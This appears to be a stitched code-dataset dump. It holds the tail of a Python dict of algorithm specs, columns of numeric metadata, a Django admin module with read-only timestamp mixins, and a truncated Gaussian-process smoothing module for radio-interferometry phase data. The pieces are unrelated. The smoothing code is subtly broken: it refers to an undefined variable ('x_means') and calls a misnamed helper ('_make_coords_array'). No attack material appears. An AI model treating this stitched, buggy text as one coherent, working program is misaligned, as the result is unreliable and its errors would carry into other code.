        'scc_id_h': (Stage.HINT, Location.NODE, Type.POINTER),
        'A_t': (Stage.HINT, Location.EDGE, Type.MASK),
        'color': (Stage.HINT, Location.NODE, Type.CATEGORICAL),
        'd': (Stage.HINT, Location.NODE, Type.SCALAR),
        'f': (Stage.HINT, Location.NODE, Type.SCALAR),
        's_prev': (Stage.HINT, Location.NODE, Type.POINTER),
        's': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'u': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'v': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        's_last': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'time': (Stage.HINT, Location.GRAPH, Type.SCALAR),
        'phase': (Stage.HINT, Location.GRAPH, Type.MASK)
    },
    'articulation_points': {
        'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'A': (Stage.INPUT, Location.EDGE, Type.SCALAR),
        'adj': (Stage.INPUT, Location.EDGE, Type.MASK),
        'is_cut': (Stage.OUTPUT, Location.NODE, Type.MASK),
        'is_cut_h': (Stage.HINT, Location.NODE, Type.MASK),
        'pi_h': (Stage.HINT, Location.NODE, Type.POINTER),
        'color': (Stage.HINT, Location.NODE, Type.CATEGORICAL),
        'd': (Stage.HINT, Location.NODE, Type.SCALAR),
        'f': (Stage.HINT, Location.NODE, Type.SCALAR),
        'low': (Stage.HINT, Location.NODE, Type.SCALAR),
        'child_cnt': (Stage.HINT, Location.NODE, Type.SCALAR),
        's_prev': (Stage.HINT, Location.NODE, Type.POINTER),
        's': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'u': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'v': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        's_last': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'time': (Stage.HINT, Location.GRAPH, Type.SCALAR)
    },
    'bridges': {
        'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'A': (Stage.INPUT, Location.EDGE, Type.SCALAR),
        'adj': (Stage.INPUT, Location.EDGE, Type.MASK),
        'is_bridge': (Stage.OUTPUT, Location.EDGE, Type.MASK),
        'is_bridge_h': (Stage.HINT, Location.EDGE, Type.MASK),
        'pi_h': (Stage.HINT, Location.NODE, Type.POINTER),
        'color': (Stage.HINT, Location.NODE, Type.CATEGORICAL),
        'd': (Stage.HINT, Location.NODE, Type.SCALAR),
        'f': (Stage.HINT, Location.NODE, Type.SCALAR),
        'low': (Stage.HINT, Location.NODE, Type.SCALAR),
        's_prev': (Stage.HINT, Location.NODE, Type.POINTER),
        's': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'u': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'v': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        's_last': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'time': (Stage.HINT, Location.GRAPH, Type.SCALAR)
    },
    'bfs': {
        'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
        's': (Stage.INPUT, Location.NODE, Type.MASK_ONE),
        'A': (Stage.INPUT, Location.EDGE, Type.SCALAR),
        'adj': (Stage.INPUT, Location.EDGE, Type.MASK),
        'pi': (Stage.OUTPUT, Location.NODE, Type.POINTER),
        'reach_h': (Stage.HINT, Location.NODE, Type.MASK),
        'pi_h': (Stage.HINT, Location.NODE, Type.POINTER)
    },
    'mst_kruskal': {
        'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'A': (Stage.INPUT, Location.EDGE, Type.SCALAR),
        'adj': (Stage.INPUT, Location.EDGE, Type.MASK),
        'in_mst': (Stage.OUTPUT, Location.EDGE, Type.MASK),
        'in_mst_h': (Stage.HINT, Location.EDGE, Type.MASK),
        'pi': (Stage.HINT, Location.NODE, Type.POINTER),
        'u': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'v': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'root_u': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'root_v': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'mask_u': (Stage.HINT, Location.NODE, Type.MASK),
        'mask_v': (Stage.HINT, Location.NODE, Type.MASK),
        'phase': (Stage.HINT, Location.GRAPH, Type.CATEGORICAL)
    },
    'mst_prim': {
        'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
        's': (Stage.INPUT, Location.NODE, Type.MASK_ONE),
        'A': (Stage.INPUT, Location.EDGE, Type.SCALAR),
        'adj': (Stage.INPUT, Location.EDGE, Type.MASK),
        'pi': (Stage.OUTPUT, Location.NODE, Type.POINTER),
        'pi_h': (Stage.HINT, Location.NODE, Type.POINTER),
        'key': (Stage.HINT, Location.NODE, Type.SCALAR),
        'mark': (Stage.HINT, Location.NODE, Type.MASK),
        'in_queue': (Stage.HINT, Location.NODE, Type.MASK),
        'u': (Stage.HINT, Location.NODE, Type.MASK_ONE)
    },
    'bellman_ford': {
        'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
        's': (Stage.INPUT, Location.NODE, Type.MASK_ONE),
        'A': (Stage.INPUT, Location.EDGE, Type.SCALAR),
        'adj': (Stage.INPUT, Location.EDGE, Type.MASK),
        'pi': (Stage.OUTPUT, Location.NODE, Type.POINTER),
        'pi_h': (Stage.HINT, Location.NODE, Type.POINTER),
        'd': (Stage.HINT, Location.NODE, Type.SCALAR),
        'msk': (Stage.HINT, Location.NODE, Type.MASK)
    },
    'dag_shortest_paths': {
        'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
        's': (Stage.INPUT, Location.NODE, Type.MASK_ONE),
        'A': (Stage.INPUT, Location.EDGE, Type.SCALAR),
        'adj': (Stage.INPUT, Location.EDGE, Type.MASK),
        'pi': (Stage.OUTPUT, Location.NODE, Type.POINTER),
        'pi_h': (Stage.HINT, Location.NODE, Type.POINTER),
        'd': (Stage.HINT, Location.NODE, Type.SCALAR),
        'mark': (Stage.HINT, Location.NODE, Type.MASK),
        'topo_h': (Stage.HINT, Location.NODE, Type.POINTER),
        'topo_head_h': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'color': (Stage.HINT, Location.NODE, Type.CATEGORICAL),
        's_prev': (Stage.HINT, Location.NODE, Type.POINTER),
        'u': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'v': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        's_last': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'phase': (Stage.HINT, Location.GRAPH, Type.MASK)
    },
    'dijkstra': {
        'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
        's': (Stage.INPUT, Location.NODE, Type.MASK_ONE),
        'A': (Stage.INPUT, Location.EDGE, Type.SCALAR),
        'adj': (Stage.INPUT, Location.EDGE, Type.MASK),
        'pi': (Stage.OUTPUT, Location.NODE, Type.POINTER),
        'pi_h': (Stage.HINT, Location.NODE, Type.POINTER),
        'd': (Stage.HINT, Location.NODE, Type.SCALAR),
        'mark': (Stage.HINT, Location.NODE, Type.MASK),
        'in_queue': (Stage.HINT, Location.NODE, Type.MASK),
        'u': (Stage.HINT, Location.NODE, Type.MASK_ONE)
    },
    'floyd_warshall': {
        'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'A': (Stage.INPUT, Location.EDGE, Type.SCALAR),
        'adj': (Stage.INPUT, Location.EDGE, Type.MASK),
        'Pi': (Stage.OUTPUT, Location.EDGE, Type.POINTER),
        'Pi_h': (Stage.HINT, Location.EDGE, Type.POINTER),
        'D': (Stage.HINT, Location.EDGE, Type.SCALAR),
        'msk': (Stage.HINT, Location.EDGE, Type.MASK),
        'k': (Stage.HINT, Location.NODE, Type.MASK_ONE)
    },
    'bipartite_matching': {
        'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'A': (Stage.INPUT, Location.EDGE, Type.SCALAR),
        'adj': (Stage.INPUT, Location.EDGE, Type.MASK),
        's': (Stage.INPUT, Location.NODE, Type.MASK_ONE),
        't': (Stage.INPUT, Location.NODE, Type.MASK_ONE),
        'in_matching': (Stage.OUTPUT, Location.EDGE, Type.MASK),
        'in_matching_h': (Stage.HINT, Location.EDGE, Type.MASK),
        'A_h': (Stage.HINT, Location.EDGE, Type.SCALAR),
        'adj_h': (Stage.HINT, Location.EDGE, Type.MASK),
        'd': (Stage.HINT, Location.NODE, Type.SCALAR),
        'msk': (Stage.HINT, Location.NODE, Type.MASK),
        'pi': (Stage.HINT, Location.NODE, Type.POINTER),
        'u': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'phase': (Stage.HINT, Location.GRAPH, Type.MASK)
    },
    'naive_string_matcher': {
        'string': (Stage.INPUT, Location.NODE, Type.MASK),
        'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'key': (Stage.INPUT, Location.NODE, Type.CATEGORICAL),
        'match': (Stage.OUTPUT, Location.NODE, Type.MASK_ONE),
        'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
        's': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'i': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'j': (Stage.HINT, Location.NODE, Type.MASK_ONE)
    },
    'kmp_matcher': {
        'string': (Stage.INPUT, Location.NODE, Type.MASK),
        'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'key': (Stage.INPUT, Location.NODE, Type.CATEGORICAL),
        'match': (Stage.OUTPUT, Location.NODE, Type.MASK_ONE),
        'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
        'pi': (Stage.HINT, Location.NODE, Type.POINTER),
        'k': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'q': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        's': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'i': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'phase': (Stage.HINT, Location.GRAPH, Type.MASK)
    },
    'segments_intersect': {
        'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'x': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'y': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'intersect': (Stage.OUTPUT, Location.GRAPH, Type.MASK),
        'i': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'j': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'k': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'dir': (Stage.HINT, Location.NODE, Type.SCALAR),
        'on_seg': (Stage.HINT, Location.NODE, Type.MASK)
    },
    'graham_scan': {
        'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'x': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'y': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'in_hull': (Stage.OUTPUT, Location.NODE, Type.MASK),
        'best': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'atans': (Stage.HINT, Location.NODE, Type.SCALAR),
        'in_hull_h': (Stage.HINT, Location.NODE, Type.MASK),
        'stack_prev': (Stage.HINT, Location.NODE, Type.POINTER),
        'last_stack': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'i': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'phase': (Stage.HINT, Location.GRAPH, Type.CATEGORICAL)
    },
    'jarvis_march': {
        'pos': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'x': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'y': (Stage.INPUT, Location.NODE, Type.SCALAR),
        'in_hull': (Stage.OUTPUT, Location.NODE, Type.MASK),
        'pred_h': (Stage.HINT, Location.NODE, Type.POINTER),
        'in_hull_h': (Stage.HINT, Location.NODE, Type.MASK),
        'best': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'last_point': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'endpoint': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'i': (Stage.HINT, Location.NODE, Type.MASK_ONE),
        'phase': (Stage.HINT, Location.GRAPH, Type.CATEGORICAL)
    }
})
| 47.001984
| 80
| 0.612014
| 3,004
| 23,689
| 4.73036
| 0.090546
| 0.222942
| 0.297255
| 0.251232
| 0.83392
| 0.831809
| 0.789726
| 0.740253
| 0.68297
| 0.67931
| 0
| 0.000693
| 0.207776
| 23,689
| 503
| 81
| 47.095427
| 0.756487
| 0.059184
| 0
| 0.551422
| 0
| 0
| 0.091575
| 0.004761
| 0
| 0
| 0
| 0
| 0.002188
| 1
| 0.002188
| false
| 0
| 0.006565
| 0
| 0.052516
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0b5ae2841183fda9d35ef99267b3db813c438d1a
| 1,479
|
py
|
Python
|
ara/classes/admin.py
|
sparcs-kaist/new-ara-api
|
63998da575cb148347708199fe1345c4e7ee3e1b
|
[
"MIT"
] | 19
|
2017-09-13T07:51:58.000Z
|
2022-03-28T11:04:03.000Z
|
ara/classes/admin.py
|
sparcs-kaist/new-ara-api
|
63998da575cb148347708199fe1345c4e7ee3e1b
|
[
"MIT"
] | 147
|
2017-09-14T13:45:30.000Z
|
2022-03-14T15:54:09.000Z
|
ara/classes/admin.py
|
sparcs-kaist/new-ara-api
|
63998da575cb148347708199fe1345c4e7ee3e1b
|
[
"MIT"
] | 5
|
2019-08-31T13:13:30.000Z
|
2021-03-26T15:46:38.000Z
|
from django.contrib import admin
class MetaDataModelAdmin(admin.ModelAdmin):
    """ModelAdmin variant that keeps the audit timestamp fields read-only."""

    meta_data_fields = (
        'created_at',
        'updated_at',
        'deleted_at',
    )

    def get_readonly_fields(self, request, obj=None) -> list:
        """Return the inherited read-only fields plus any missing audit fields."""
        fields = list(super().get_readonly_fields(request, obj))
        missing = [name for name in self.meta_data_fields if name not in fields]
        return fields + missing
class MetaDataStackedInline(admin.StackedInline):
    """StackedInline variant that keeps the audit timestamp fields read-only."""

    meta_data_fields = (
        'created_at',
        'updated_at',
        'deleted_at',
    )

    def get_readonly_fields(self, request, obj=None) -> list:
        """Return the inherited read-only fields plus any missing audit fields."""
        fields = list(super().get_readonly_fields(request, obj))
        missing = [name for name in self.meta_data_fields if name not in fields]
        return fields + missing
class MetaDataTabularInline(admin.TabularInline):
    """TabularInline variant that keeps the audit timestamp fields read-only."""

    meta_data_fields = (
        'created_at',
        'updated_at',
        'deleted_at',
    )

    def get_readonly_fields(self, request, obj=None) -> list:
        """Return the inherited read-only fields plus any missing audit fields."""
        fields = list(super().get_readonly_fields(request, obj))
        missing = [name for name in self.meta_data_fields if name not in fields]
        return fields + missing
| 27.90566
| 73
| 0.665991
| 176
| 1,479
| 5.238636
| 0.198864
| 0.273319
| 0.126898
| 0.06833
| 0.843818
| 0.843818
| 0.843818
| 0.843818
| 0.843818
| 0.843818
| 0
| 0
| 0.254226
| 1,479
| 52
| 74
| 28.442308
| 0.835902
| 0
| 0
| 0.810811
| 0
| 0
| 0.060852
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.081081
| false
| 0
| 0.027027
| 0
| 0.351351
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0ba485ab50621e156517f6f73840af8c829acae1
| 45,569
|
py
|
Python
|
src/ionotomo/bayes/smoothing.py
|
Joshuaalbert/IonoTomo
|
9f50fbac698d43a824dd098d76dce93504c7b879
|
[
"Apache-2.0"
] | 7
|
2017-06-22T08:47:07.000Z
|
2021-07-01T12:33:02.000Z
|
src/ionotomo/bayes/smoothing.py
|
Joshuaalbert/IonoTomo
|
9f50fbac698d43a824dd098d76dce93504c7b879
|
[
"Apache-2.0"
] | 1
|
2019-04-03T15:21:19.000Z
|
2019-04-03T15:48:31.000Z
|
src/ionotomo/bayes/smoothing.py
|
Joshuaalbert/IonoTomo
|
9f50fbac698d43a824dd098d76dce93504c7b879
|
[
"Apache-2.0"
] | 2
|
2020-03-01T16:20:00.000Z
|
2020-07-07T15:09:02.000Z
|
import numpy as np
import tensorflow as tf
import logging
logging.basicConfig(format='%(asctime)s %(message)s')
import pylab as plt
import cmocean
from scipy.spatial import cKDTree
from ionotomo.tomography.pipeline import Pipeline
from ionotomo.settings import TFSettings
from timeit import default_timer
from ionotomo import *
import astropy.coordinates as ac
import astropy.units as au
import gpflow as gp
import sys
import h5py
import threading
from timeit import default_timer
#%matplotlib notebook
from concurrent import futures
from functools import partial
from threading import Lock
import astropy.units as au
import astropy.time as at
from collections import deque
from ionotomo.bayes.gpflow_contrib import GPR_v2,Gaussian_v2
from scipy.cluster.vq import kmeans2
class Smoothing(object):
"""
Class for all types of GP smoothing/conditioned prediction
"""
def __init__(self,datapack):
if isinstance(datapack, str):
datapack = DataPack(filename=datapack)
self.datapack = datapack
def _make_coord_array(t,d,f):
"""Static method to pack coordinates
"""
Nt,Nd,Nf = t.shape[0],d.shape[0], f.shape[0]
X = np.zeros([Nt,Nd,Nf,4],dtype=np.float64)
for j in range(Nt):
for k in range(Nd):
for l in range(Nf):
X[j,k,l,0:2] = d[k,:]
X[j,k,l,2] = t[j]
X[j,k,l,3] = f[l]
X = np.reshape(X,(Nt*Nd*Nf,4))
return X
def _solve_svgp(coords, data, var=None, M = 100, minibatch_size=500, iterations=1000, ARD=True, lock = None):
assert len(coords) == len(data.shape)-1
num_latent = data.shape[-1]
data_mean = [data[...,i].mean() for i in range(num_latent)]
data_std = [data[...,i].std() for i in range(num_latent)]
data = np.stack([(data[...,i] - d_m)/d_s for i,(d_m,d_s) in enumerate(zip(data_mean,data_std))],axis=-1)
Y = data.reshape((-1,num_latent))
x_mean = [c.mean() for c in coords]
x_std = [c.std() for c in coords]
coords = [(c-c_m)/c_s for c,c_m,c_s in zip(coords, x_means,x_std)]
X = Smoothing._make_coords_array(*coords)
Z = kmeans2(X, M, minit='points')[0]
with tf.Session(graph=tf.Graph()) as sess:
if lock is not None:
lock.acquire()
try:
with gp.defer_build():
kern = gp.kernels.RBF(len(coords),ARD=True)
kern.lengthscales.prior = gp.priors.Gaussian(0.,1/3.)
mean = gp.mean_functions.Constant()
m = gp.models.svgp.SVGP(X, Y, kern, mean_function = mean,
likelihood=gp.likelihoods.Gaussian() if var is None else Gaussian_v2(Y_var=var, trainable=False),
Z=Z, num_latent=num_latent, minibatch_size=minibatch_size, whiten=True)
m.feature.set_trainable(False)
m.compile()
finally:
if lock is not None:
lock.release()
gp.train.AdamOptimizer(0.01).minimize(m, maxiter=iterations)
ystar,varstar = m.predict_y(X)
ystar = ystar.reshape(data.shape)
ystar = np.stack([ystar[...,i]*d_s + d_m for i,(d_m,d_s) in enumerate(zip(data_mean,data_std))],axis=-1)
varstar = varstar.reshape(data.shape)
varstar = np.stack([varstar[...,i]*d_s**2 for i,(d_m,d_s) in enumerate(zip(data_mean,data_std))],axis=-1)
return ystar, varstar
def _solve_block_svgp(phase, error, coords, lock, init=(None,None),pargs=None,verbose=False):
try:
if verbose:
logging.warning("{}".format(pargs))
error_scale = np.mean(np.abs(phase))*0.1/np.mean(error)
if verbose:
logging.warning("Error scaling {}".format(error_scale))
y_mean = np.mean(phase)
y_scale = np.std(phase) + 1e-6
y = (phase - y_mean)/y_scale
y = y.flatten()[:,None]
var = (error/y_scale*error_scale)**2
var = var.flatten()
t,d,f = coords
t_scale = np.max(t) - np.min(t) + 1e-6
d_scale = np.std(d - np.mean(d,axis=0)) + 1e-6
f_scale = np.max(f) - np.min(f) + 1e-6
t = (t - np.mean(t))/(t_scale+1e-6)
d = (d - np.mean(d,axis=0))/(d_scale+1e-6)
f = (f - np.mean(f))/(f_scale+1e-6)
X = Smoothing._make_coord_array(t,d,f)
M = 100
Z = kmeans2(X, M, minit='points')[0]
with tf.Session(graph=tf.Graph()) as sess:
lock.acquire()
try:
with gp.defer_build():
if init[0] is None:
k_space = gp.kernels.RBF(2,active_dims = [0,1],lengthscales=[0.3])
else:
k_space = gp.kernels.RBF(2,active_dims = [0,1],lengthscales=[init[0]/d_scale])
logging.warning('Using spatial scale: {}'.format(init[0]))
k_space.lengthscales.set_trainable(False)
if init[1] is None:
k_time = gp.kernels.RBF(1,active_dims = [2],lengthscales=[0.3])
else:
k_time = gp.kernels.RBF(1,active_dims = [2],lengthscales=[init[1]/t_scale])
logging.warning('Using spatial scale: {}'.format(init[1]))
k_time.lengthscales.set_trainable(False)
k_freq = gp.kernels.RBF(1,active_dims = [3], lengthscales=[10.])
#k_white = gp.kernels.White(4)
kern = k_space * k_time * k_freq# + k_white
mean = gp.mean_functions.Zero()#Constant()
m = gp.models.svgp.SVGP(X, y, kern, mean_function = mean,
likelihood=Gaussian_v2(Y_var=var, trainable=False),
Z=Z, num_latent=1, minibatch_size=100, whiten=True)
m.feature.set_trainable(False)
m.kern.rbf_1.lengthscales.prior = gp.priors.Gaussian(1./d_scale,0.5/d_scale)
m.kern.rbf_2.lengthscales.prior = gp.priors.Gaussian(0,1./3.)
m.kern.rbf_3.lengthscales.set_trainable(False)
m.compile()
finally:
lock.release()
iterations=200
gp.train.AdamOptimizer(0.1).minimize(m, maxiter=iterations)
if verbose:
logging.warning(m)
kern_lengthscales = (
m.kern.rbf_1.lengthscales.value[0]*d_scale,
m.kern.rbf_2.lengthscales.value[0]*t_scale,
m.kern.rbf_3.lengthscales.value[0]*f_scale
)
kern_variance = m.kern.rbf_1.variance.value*m.kern.rbf_2.variance.value*m.kern.rbf_3.variance.value*y_scale**2
if verbose:
logging.warning(kern_lengthscales)
logging.warning(kern_variance)
return kern_lengthscales, kern_variance
except Exception as e:
print(e)
    def _solve_block(phase, error, coords, lock, pargs=None,verbose=False):
        """Solve one (antenna, time-chunk) block for kernel hyperparameters.

        Fits a GPR_v2 model (exact GP with a fixed conditioning set) with a
        product RBF kernel over direction, time and frequency to the
        standardized phases.

        phase, error : (Nt, Nd, Nf) phases and their errors.
        coords : tuple (t, d, f) of the time, direction and frequency axes.
        lock : lock serializing the (non-thread-safe) model build.
        pargs : progress description logged when ``verbose``.

        Returns (kern_lengthscales, kern_variance) rescaled to physical
        units, or None if anything raised (the exception is printed and
        swallowed -- callers must tolerate a None result).
        """
        try:
            if verbose:
                logging.warning("{}".format(pargs))
            # Scale errors so the mean error is ~10% of the mean |phase|.
            error_scale = np.mean(np.abs(phase))*0.1/np.mean(error)
            if verbose:
                logging.warning("Error scaling {}".format(error_scale))
            # Standardize the observations.
            y_mean = np.mean(phase)
            y_scale = np.std(phase) + 1e-6
            y = (phase - y_mean)/y_scale
            y = y.flatten()[:,None]
            var = (error/y_scale*error_scale)**2
            var = var.flatten()
            # Standardize each coordinate axis.
            t,d,f = coords
            t_scale = np.max(t) - np.min(t) + 1e-6
            d_scale = np.std(d - np.mean(d,axis=0)) + 1e-6
            f_scale = np.max(f) - np.min(f) + 1e-6
            t = (t - np.mean(t))/(t_scale+1e-6)
            d = (d - np.mean(d,axis=0))/(d_scale+1e-6)
            f = (f - np.mean(f))/(f_scale+1e-6)
            X = Smoothing._make_coord_array(t,d,f)
            ###
            # stationary points: all directions, the 10 central times, and
            # the central frequency form the conditioning set for GPR_v2.
            d_slice = np.s_[:]
            t_slice = np.s_[len(t)>>1:(len(t)>>1) + 10]
            f_slice = np.s_[len(f)>>1:(len(f)>>1)+1]
            Z = Smoothing._make_coord_array(t[t_slice],d[d_slice,:],f[f_slice])
            Zy = ((phase[t_slice,d_slice,f_slice] - y_mean)/y_scale).flatten()[:,None]
            Zvar = (error[t_slice,d_slice,f_slice].flatten() / y_scale * error_scale)**2
            with tf.Session(graph=tf.Graph()) as sess:
                # Model construction is not thread-safe; serialize it.
                lock.acquire()
                try:
                    with gp.defer_build():
                        k_space = gp.kernels.RBF(2,active_dims = [0,1],lengthscales=[0.1])
                        k_time = gp.kernels.RBF(1,active_dims = [2],lengthscales=[0.25])
                        k_freq = gp.kernels.RBF(1,active_dims = [3], lengthscales=[10.0])
                        #k_white = gp.kernels.White(4)
                        kern = k_space * k_time * k_freq# + k_white
                        mean = gp.mean_functions.Constant()
                        m = GPR_v2(X, y, kern, Z=Z,Zy=Zy,Zvar=Zvar, mean_function=mean,var=var,trainable_var=False, minibatch_size=400)
                        # Frequency length scale is held fixed.
                        m.kern.rbf_3.lengthscales.set_trainable(False)
                        m.compile()
                finally:
                    lock.release()
                o = gp.train.ScipyOptimizer(method='BFGS')
                #o = gp.train.AdamOptimizer(0.01)
                sess = m.enquire_session()
                with sess.as_default():
                    marginal_log_likelihood = [m.objective.eval()]
                    # Several short BFGS restarts rather than one long run.
                    for i in range(3):
                        o.minimize(m,maxiter=4)
                    #marginal_log_likelihood.append(m.objective.eval())
                    #print(marginal_log_likelihood[-1])
                #plt.plot(marginal_log_likelihood)
                #plt.show()
                if verbose:
                    logging.warning(m)
                # Rescale the fitted hyperparameters back to physical units.
                kern_lengthscales = (
                    m.kern.rbf_1.lengthscales.value[0]*d_scale,
                    m.kern.rbf_2.lengthscales.value[0]*t_scale,
                    m.kern.rbf_3.lengthscales.value[0]*f_scale
                    )
                kern_variance = m.kern.rbf_1.variance.value*m.kern.rbf_2.variance.value*m.kern.rbf_3.variance.value*y_scale**2
                if verbose:
                    logging.warning(kern_lengthscales)
                    logging.warning(kern_variance)
                return kern_lengthscales, kern_variance
        except Exception as e:
            print(e)
def _ref_distance(self,antennas,i0=0):
x = antennas.x.to(au.km).value
y = antennas.y.to(au.km).value
z = antennas.z.to(au.km).value
dist = np.sqrt((x-x[i0])**2 + (y-y[i0])**2 + (z-z[i0])**2)
return dist
def refine_statistics_timeonly(self,results_file):
plt.style.use('ggplot')
antennas,antenna_labels = self.datapack.get_antennas(-1)
data = np.load(results_file)
# antenna, time
length_scales = data['kern_ls'][:,:,0]
y_mean = length_scales.mean()
y_std = length_scales.std()
times = data['time']
time_mean = times.mean()
time_std = times.std()
labels = data['antenna']
array_center = ac.ITRS(np.mean(antennas.data))
enu = ENU(location = array_center)
ants_enu = antennas.transform_to(enu)
positions = np.array([ants_enu.east.to(au.km).value[1:], ants_enu.north.to(au.km).value[1:]]).T
pos_mean = positions.mean(0)
positions -= pos_mean
pos_std = positions.std(0).mean()
positions /= pos_std
Nt,Np = times.shape[0],positions.shape[0]
X = np.zeros([Np,Nt,1],dtype=np.float64)
for j in range(Nt):
for k in range(Np):
X[k,j,0] = (times[j] - time_mean)/time_std
# X[j,k,1:3] = positions[k,:]
X = np.reshape(X,(Nt*Np,1))
Xs = (times[:,None]-time_mean)/time_std
Y = (length_scales.reshape((-1,1)) - y_mean)/y_std
M = 100
Z = kmeans2(X, M, minit='points')[0]
with tf.Session(graph=tf.Graph()) as sess:
with gp.defer_build():
k_time = gp.kernels.RBF(1,active_dims = [0],lengthscales=[0.5])
kern = k_time
mean = gp.mean_functions.Zero()#Constant()
m = gp.models.svgp.SVGP(X, Y, kern, mean_function = mean,
likelihood=gp.likelihoods.Gaussian(),
Z=Z, num_latent=1, minibatch_size=500, whiten=True)
m.feature.set_trainable(False)
k_time.lengthscales.prior = gp.priors.Gaussian(0,1/3.)
m.likelihood.prior = gp.priors.Gaussian(0,1/3.)
m.compile()
iterations=1000
gp.train.AdamOptimizer(0.01).minimize(m, maxiter=iterations)
print(m)
y,var = m.predict_y(Xs)
y = y*y_std + y_mean
y = y.reshape((Nt,1))
var = var*y_std**2
std = np.sqrt(var).reshape((Nt,1))
fig,ax = plt.subplots(nrows=1,ncols=1,figsize=(8,8))
[ax.scatter(times,length_scales[i,:],marker='+',c='black',alpha=0.15) for i in range(length_scales.shape[0])]
ax.plot(times,length_scales.mean(0),lw=2,ls='--',color='red',label='antenna average')
ax.plot(times,y[:,0],color='blue',label='Bayes')
ax.fill_between(times,y[:,0]+std[:,0],y[:,0]-std[:,0],alpha=0.25,color='blue')
ax.set_ylim([0.25,2.75])
ax.set_xlabel('Time (mjd)')
ax.set_ylabel('Phase screen directional correlation scale (deg)')
ax.legend()
plt.tight_layout()
plt.savefig(results_file.replace('.npz','_directional_scale_timeonly.png'))
plt.show()
# antenna, time, 1
l_space = y.copy()
# antenna, time
length_scales = data['kern_ls'][:,:,1]
y_mean = length_scales.mean()
y_std = length_scales.std()
times = data['time']
time_mean = times.mean()
time_std = times.std()
labels = data['antenna']
array_center = ac.ITRS(np.mean(antennas.data))
enu = ENU(location = array_center)
ants_enu = antennas.transform_to(enu)
positions = np.array([ants_enu.east.to(au.km).value[1:], ants_enu.north.to(au.km).value[1:]]).T
pos_mean = positions.mean(0)
positions -= pos_mean
pos_std = positions.std(0).mean()
positions /= pos_std
Nt,Np = times.shape[0],positions.shape[0]
X = np.zeros([Np,Nt,1],dtype=np.float64)
for j in range(Nt):
for k in range(Np):
X[k,j,0] = (times[j] - time_mean)/time_std
# X[j,k,1:3] = positions[k,:]
X = np.reshape(X,(Nt*Np,1))
Xs = (times[:,None] - time_mean)/time_std
Y = (length_scales.reshape((-1,1)) - y_mean)/y_std
M = 100
Z = kmeans2(X, M, minit='points')[0]
with tf.Session(graph=tf.Graph()) as sess:
with gp.defer_build():
k_time = gp.kernels.RBF(1,active_dims = [0],lengthscales=[0.5])
kern = k_time
mean = gp.mean_functions.Zero()#Constant()
m = gp.models.svgp.SVGP(X, Y, kern, mean_function = mean,
likelihood=gp.likelihoods.Gaussian(),
Z=Z, num_latent=1, minibatch_size=500, whiten=True)
m.feature.set_trainable(False)
k_time.lengthscales.prior = gp.priors.Gaussian(0,1/3.)
